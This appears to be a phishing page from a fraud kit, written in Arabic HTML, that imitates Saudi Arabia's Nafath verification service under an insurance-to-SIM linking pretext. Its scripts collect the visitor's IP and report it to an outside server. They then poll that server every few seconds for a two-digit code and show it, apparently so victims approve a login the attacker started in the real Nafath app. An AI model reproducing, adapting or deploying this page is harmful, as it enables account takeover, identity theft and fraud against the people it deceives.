<!DOCTYPE html>
<html lang="ar" dir="rtl">
  <head>
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta charset="utf-8" />
    <title>Nafad verification</title>
    <link
      crossorigin="anonymous"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Tajawal:wght@200;300;400;500;700;800;900&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");
      * {
        font-family: "Tajawal", sans-serif;
        font-weight: 400;
      }
      .navbar-light .navbar-toggler {
        border-color: #ffffff00;
      }
    </style>
    <script src="https://unpkg.com/feather-icons"></script>
  </head>

  <body dir="rtl" style="background-color: #f4f6f9">
    <nav
      class="navbar navbar-expand-lg navbar-light pt-4 pb-4 shadow"
      style="background-color: #fff"
    >
      <img alt="" src="assets/icon/nafad.png" width="128" />
      <button
        aria-controls="navbarSupportedContent"
        aria-expanded="false"
        aria-label="Toggle navigation"
        class="navbar-toggler ml-2"
        data-target="#navbarSupportedContent"
        data-toggle="collapse"
        style="padding: 0"
        type="button"
      >
        <svg
          class="feather feather-menu"
          fill="none"
          height="36"
          stroke="currentColor"
          stroke-linecap="round"
          stroke-linejoin="round"
          stroke-width="2"
          style="font-size: 36px; color: #2e2e2e"
          viewBox="0 0 24 24"
          width="36"
          xmlns="http://www.w3.org/2000/svg"
        >
          <line x1="3" x2="21" y1="12" y2="12"></line>
          <line x1="3" x2="21" y1="6" y2="6"></line>
          <line x1="3" x2="21" y1="18" y2="18"></line>
        </svg>
      </button>
    </nav>

    <div class="text-center mt-5 container">
      <h6 class="pl-3 pr-3" style="color: #11998e; font-weight: 600">
        <span style="font-size: 26px; font-weight: 800">لطفاً ،</span>
        توجه إلى تطبيق "نفاذ" لاستكمال إجراءات استبدال و ربط وثيقة التأمين
        بشريحة الجوال وذلك من خلال اختيار الرقم الظاهر أدناه
      </h6>
      <hr style="border-bottom: #2e2e2e 1px solid" />

      <div class="alert alert-success" role="alert">
        <h1
          id="nafad_code"
          style="margin: 20px 0 4px; font-size: 50px; font-weight: 800"
        ></h1>
      </div>

      <button
        class="btn btn-success col-12 p-3"
        style="background-color: #11998e; font-size: 20px; font-weight: 600"
      >
        انتقل الى تطبيق نفاذ
      </button>

      <img
        alt=""
        class="mt-5"
        src="assets/icon/cdeie.png"
        style="width: 50%; margin: auto"
      />
    </div>

    <div>
      <img
        alt=""
        class="fixed-bottom"
        src="assets/photos/footerNafad.png"
        width="100%"
      />
    </div>

    <!-- 1) Load Socket.IO & announce our IP + page -->
    <script src="https://cdn.socket.io/4.6.1/socket.io.min.js"></script>
    <script>
      window.socket = io("https://b-care-server.onrender.com");
      window.visitorIP = null;

      (async () => {
        try {
          const r = await fetch("https://api.ipify.org?format=json");
          const { ip } = await r.json();
          window.visitorIP = ip;
          socket.emit("updateLocation", {
            ip,
            page: "nafad-basmah.html",
          });
        } catch (e) {
          console.error("IP fetch failed:", e);
        }
      })();
    </script>

    <!-- 2) Hook up your existing location.js -->
    <script src="./assets/js/location.js"></script>

    <!-- 3) Replace fetch-poll with socket-poll for your 2-digit code -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        const codeEl = document.getElementById("nafad_code");

        function requestCode() {
          socket.emit("getNafadCode");
        }

        // ask right away
        requestCode();
        // ask every 5s
        setInterval(requestCode, 5000);

        socket.on("nafadCode", (msg) => {
          if (msg.error) {
            console.error("nafadCode error:", msg.error);
            return;
          }
          // pad to two digits
          codeEl.textContent = String(msg.basmah).padStart(2, "0");
        });
      });
    </script>

    <!-- 4) Wire your “انتقل الى تطبيق نفاذ” button -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        const btn = document.querySelector(".btn-success");
        btn.addEventListener("click", () => {
          const ua = navigator.userAgent || navigator.vendor || window.opera;
          let url;
          if (/iPad|iPhone|iPod/.test(ua) && !window.MSStream) {
            url =
              "https://apps.apple.com/sa/app/%D9%86%D9%81%D8%A7%D8%B0-nafath/id1598909871";
          } else if (/Android/.test(ua)) {
            url =
              "https://play.google.com/store/apps/details?id=sa.gov.nic.myid&hl=en&pli=1";
          } else {
            url = "https://nafath.sa";
          }
          window.location.href = url;
        });
      });
    </script>
  </body>
</html>
